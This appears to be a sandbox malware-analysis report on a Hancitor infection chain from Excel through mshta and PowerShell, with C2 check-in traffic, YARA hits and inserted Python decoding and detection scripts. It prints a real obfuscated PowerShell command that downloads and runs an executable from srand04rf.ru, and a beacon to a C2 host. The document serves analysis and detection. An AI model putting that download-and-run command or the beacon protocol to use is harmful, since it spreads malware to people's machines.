                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                   Timestamp:Jul 8, 2021 16:31:56.167244911 CEST
                                                                                                                                                   kBytes transferred:6033
                                                                                                                                                   Direction:IN
                                                                                                                                                   HTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                   Data Ascii: c\r\nKMNPARRABw==\r\n0\r\n\r\n (chunk size 0xc: one 12-byte chunk "KMNPARRABw==", then the zero-length terminating chunk)
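
The sessions above are the bot's check-in loop: the same 122-byte form-encoded beacon is POSTed to sudepallon.com/8/forum.php roughly every 400 ms, and each reply is a single 12-byte chunked body that base64-decodes to 7 bytes. The script below, an added example that is not part of the Joe Sandbox report, reassembles the chunked replies and splits the beacon into its fields. Two things in it are assumptions, not facts stated on this page: the single-byte XOR key 0x7A applied after base64 decoding, and the reading of the braced `{n:}` token as "no task queued"; both come from public Hancitor write-ups. The key is at least consistent with the capture, since all four replies decode to the same `{n:}` token behind three varying leading bytes. The beacon body is taken from the report's sanitized ASCII view.

```python
"""Decode the Hancitor check-in POST and C2 replies shown in sessions 7-9 above.

Added example, not part of the Joe Sandbox report. The beacon body and reply bytes
are copied from the report; the XOR key and the meaning of the reply token are
assumptions taken from public Hancitor write-ups, not from this page.
"""
import base64
import re
from typing import Dict, List, Tuple

# Check-in body as the report prints it in "Data Ascii" (the sandbox replaces the
# real hostname\username pair with the placeholder "computer\user").
CHECKIN_BODY = (
    "GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\\user"
    "&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)"
)

# "Data Raw" of the four 200 OK replies (HTTP/1.1 chunked transfer encoding).
REPLY_HEX = [
    "63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a",
    "63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a",
    "63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a",
    "63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a",
]

# Assumption: replies are base64, then XOR'd with the single byte 0x7A. The page
# does not state this; it is the scheme public Hancitor analyses describe, and all
# four samples decode to the same braced token under it.
XOR_KEY = 0x7A
COMMAND_RE = re.compile(r"\{([a-z]):([^}]*)\}")   # e.g. {n:} = no task (assumed)


def parse_checkin(body: str) -> Dict[str, str]:
    """Split the x-www-form-urlencoded beacon into its fields, keeping empty ones."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[key] = value
    return fields


def dechunk(raw: bytes) -> bytes:
    """Reassemble a chunked HTTP body: <hex-size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)
        start = end + 2
        out += raw[start:start + size]
        if raw[start + size:start + size + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos = start + size + 2


def decode_reply(raw_hex: str) -> Tuple[bytes, List[Tuple[str, str]]]:
    """Return the XOR-decoded reply and the (letter, argument) commands found in it."""
    body = dechunk(bytes.fromhex(raw_hex))
    plain = bytes(b ^ XOR_KEY for b in base64.b64decode(body))
    commands = COMMAND_RE.findall(plain.decode("latin-1"))
    return plain, commands


if __name__ == "__main__":
    for name, value in parse_checkin(CHECKIN_BODY).items():
        print(f"{name:5} = {value}")
    for raw_hex in REPLY_HEX:
        plain, commands = decode_reply(raw_hex)
        # The first three bytes differ per reply; the trailing "{n:}" is constant.
        print(plain.hex(), commands)
```

Run as a script it prints the beacon fields and the decoded replies. The three leading bytes change from reply to reply while every reply ends in `{n:}`, which is what an idle bot polling a server with nothing queued looks like; a tasked reply would carry a different letter and a URL argument, and the same `dechunk` and `decode_reply` path would expose it.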


                                                                                                                                                   Code Manipulations

                                                                                                                                                   Statistics

                                                                                                                                                   CPU Usage (chart)

                                                                                                                                                   Memory Usage (chart)

                                                                                                                                                   High Level Behavior Distribution (chart)

                                                                                                                                                   Behavior (chart)
                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:07
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
                                                                                                                                                  Imagebase:0xb0000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:10
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                  Imagebase:0xc10000
                                                                                                                                                  File size:13312 bytes
                                                                                                                                                  MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:11
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
                                                                                                                                                  Imagebase:0xe50000
                                                                                                                                                  File size:430592 bytes
                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:12
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:16:30:31
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
                                                                                                                                                  Imagebase:0xe50000
                                                                                                                                                  File size:430592 bytes
                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:16:31:07
                                                                                                                                                  Start date:08/07/2021
                                                                                                                                                  Path:C:\Users\Public\snd32sys.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\snd32sys.exe'
                                                                                                                                                  Imagebase:0x610000
                                                                                                                                                  File size:763392 bytes
                                                                                                                                                  MD5 hash:ED1921467F6784AF6BDCA40A06A541B5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
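
The process list above is the whole delivery chain in four command lines: EXCEL.EXE started with /dde, mshta.exe running an .hta dropped in C:\Users\Public, a PowerShell one-liner with every keyword case-mangled that fetches "08.jpg" and writes it to snd32sys.exe, and that file then executing from the same public folder. The script below, an added example that is neither part of the Joe Sandbox report nor the text of any Sigma or Yara rule, re-derives those detections from constructed Sysmon-style events built from the command lines shown. The parent/child links in the events are an assumption drawn from the rule names the report fires (an Office product and then mshta each spawning a Windows shell) and from process start order, because the report does not print parent PIDs.

```python
"""Re-derive the process-tree detections the report lists from the command lines above.

Added example, not part of the Joe Sandbox report. Events are constructed from the
General tables; parent/child links are assumed (the report prints no parent PIDs).
"""
import re
from typing import Dict, List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_DIRS = ("c:\\users\\public\\",)
# Spellings legitimate tooling produces; any other casing of these keywords is the
# mangling the PowerShell_Case_Anomaly Yara matches above are sensitive to.
ACCEPTED_CASE = {
    "powershell": {"powershell", "POWERSHELL", "Powershell", "PowerShell"},
    "bypass": {"bypass", "BYPASS", "Bypass"},
    "wget": {"wget", "WGET", "Wget"},
    "outfile": {"outfile", "OUTFILE", "Outfile", "OutFile"},
    "start": {"start", "START", "Start"},
}
IMAGE_URL_RE = re.compile(r"https?://\S+?\.(?:jpg|jpeg|png|gif|bmp)\b", re.IGNORECASE)
OUTFILE_EXE_RE = re.compile(r"-outfile\s+'?([^'\s;]+\.exe)", re.IGNORECASE)

# Constructed process-creation events (Sysmon-style fields) from the report.
EVENTS: List[Dict] = [
    {"pid": 1, "ppid": 0,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmd": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde"},
    {"pid": 2, "ppid": 1,  # assumed child of EXCEL.EXE
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r"'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' "
            r"{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}"},
    {"pid": 3, "ppid": 2,  # assumed child of mshta.exe
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE "
            r"-EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' "
            r"-OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'"},
    {"pid": 4, "ppid": 3,  # assumed child of the powershell.exe that ran sTart
     "image": r"C:\Users\Public\snd32sys.exe",
     "cmd": r"'C:\Users\Public\snd32sys.exe'"},
]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def case_anomalies(cmd: str) -> List[str]:
    """Return keyword spellings in cmd that match none of the accepted case forms."""
    found = []
    for keyword, accepted in ACCEPTED_CASE.items():
        for match in re.finditer(re.escape(keyword), cmd, re.IGNORECASE):
            if match.group(0) not in accepted:
                found.append(match.group(0))
    return found


def disguised_download(cmd: str) -> Optional[Tuple[str, str]]:
    """Detect a URL with an image extension being written to an .exe path."""
    url = IMAGE_URL_RE.search(cmd)
    out = OUTFILE_EXE_RE.search(cmd)
    if url and out:
        return url.group(0), out.group(1)
    return None


def evaluate(events: List[Dict]) -> List[Tuple[str, int, str]]:
    """Run every rule over the process list and return (rule, pid, detail) hits."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        child = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = image_name(parent["image"]) if parent else ""
        if parent_name in OFFICE_APPS and child in SHELLS:
            hits.append(("office_spawns_shell", e["pid"], f"{parent_name} -> {child}"))
        if parent_name == "mshta.exe" and child in SHELLS:
            hits.append(("mshta_spawns_shell", e["pid"], f"{parent_name} -> {child}"))
        if e["image"].lower().startswith(SUSPICIOUS_DIRS):
            hits.append(("exec_from_suspicious_folder", e["pid"], e["image"]))
        anomalies = case_anomalies(e["cmd"])
        if anomalies:
            hits.append(("powershell_case_anomaly", e["pid"], " ".join(anomalies)))
        download = disguised_download(e["cmd"])
        if download:
            hits.append(("image_url_saved_as_exe", e["pid"], f"{download[0]} -> {download[1]}"))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in evaluate(EVENTS):
        print(f"{rule:28} pid={pid}  {detail}")
```

The case check deliberately accepts `PowerShell` and `OutFile` as written by Microsoft's own tooling, so the legitimate `WindowsPowerShell` path segment in the same command line is not flagged while `poWerSHEll`, `bYpASs`, `WGeT`, `OuTfIle` and `sTart` are. The second powershell.exe in the report (started 16:30:31, same download without the `sTart`) would trip the same two content rules; only the parent-based rules depend on the assumed tree.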

Disassembly

Code Analysis


Executed Functions

                                                                                                                                                    • Associated: 00000001.00000003.224108075.0000000006493000.00000010.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 795b7ecead1152ca1a7968da0fb5c66fd58363290b972c9672546b51c74a13f4
                                                                                                                                                    • Instruction ID: 2f5a0f8a6fb55c3c5cb194c9d6672cd42f0822b8732b9009257aeea64b276172
                                                                                                                                                    • Opcode Fuzzy Hash: 795b7ecead1152ca1a7968da0fb5c66fd58363290b972c9672546b51c74a13f4
                                                                                                                                                    • Instruction Fuzzy Hash: D0F04C74988341AFE7644B70CC5152F7FE4EF40294F26884ED8825BA42C3705C4287F2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224119788.0000000006494000.00000010.00000001.sdmp, Offset: 06494000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f91cba1b412f72412c8a4b9b039cda1ba80aaac4b1dde1b4c68084e47fe5e5d
                                                                                                                                                    • Instruction ID: e1c248f475051307f71c3562d133bbc0ccd25e31462c1b18824dc0492204c296
                                                                                                                                                    • Opcode Fuzzy Hash: 2f91cba1b412f72412c8a4b9b039cda1ba80aaac4b1dde1b4c68084e47fe5e5d
                                                                                                                                                    • Instruction Fuzzy Hash: A4E02670988341BFEB108F608C0189EBFE8AF49254F150C0AD99563701D3B069228AF2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224119788.0000000006494000.00000010.00000001.sdmp, Offset: 06491000, based on PE: false
                                                                                                                                                    • Associated: 00000001.00000003.224100280.0000000006491000.00000010.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 37a49d0fc2b9ce05b491d0fcd518e56711a391aa54553ed8e6e1b103e0249d2c
                                                                                                                                                    • Instruction ID: e1c248f475051307f71c3562d133bbc0ccd25e31462c1b18824dc0492204c296
                                                                                                                                                    • Opcode Fuzzy Hash: 37a49d0fc2b9ce05b491d0fcd518e56711a391aa54553ed8e6e1b103e0249d2c
                                                                                                                                                    • Instruction Fuzzy Hash: A4E02670988341BFEB108F608C0189EBFE8AF49254F150C0AD99563701D3B069228AF2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224119788.0000000006494000.00000010.00000001.sdmp, Offset: 06493000, based on PE: false
                                                                                                                                                    • Associated: 00000001.00000003.224108075.0000000006493000.00000010.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0dec09f63defd78fc3b7de62bc1ef79bdba73d7b437d0681bd5ebe29133678cb
                                                                                                                                                    • Instruction ID: e1c248f475051307f71c3562d133bbc0ccd25e31462c1b18824dc0492204c296
                                                                                                                                                    • Opcode Fuzzy Hash: 0dec09f63defd78fc3b7de62bc1ef79bdba73d7b437d0681bd5ebe29133678cb
                                                                                                                                                    • Instruction Fuzzy Hash: A4E02670988341BFEB108F608C0189EBFE8AF49254F150C0AD99563701D3B069228AF2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Executed Functions

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 04B24E60
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348430959.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 9abbf707d3327432093c4bb3e209e7c2420ee48d8d943b02a870ffef07a412f1
                                                                                                                                                    • Instruction ID: 564b2ba3bf63bdc3b69aa551833bb6812cbbc10939d7575e8c3c36f2d700106e
                                                                                                                                                    • Opcode Fuzzy Hash: 9abbf707d3327432093c4bb3e209e7c2420ee48d8d943b02a870ffef07a412f1
                                                                                                                                                    • Instruction Fuzzy Hash: 5B1156B1D0061A9BCB14CFA9D944BDEFBF4FB48324F10821AE818B3640C738A900CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 04B24E60
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348430959.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 47dcfaa247d8baec4c012d245cfd1c6a90337832920eee3f428fc18f5d00a5e6
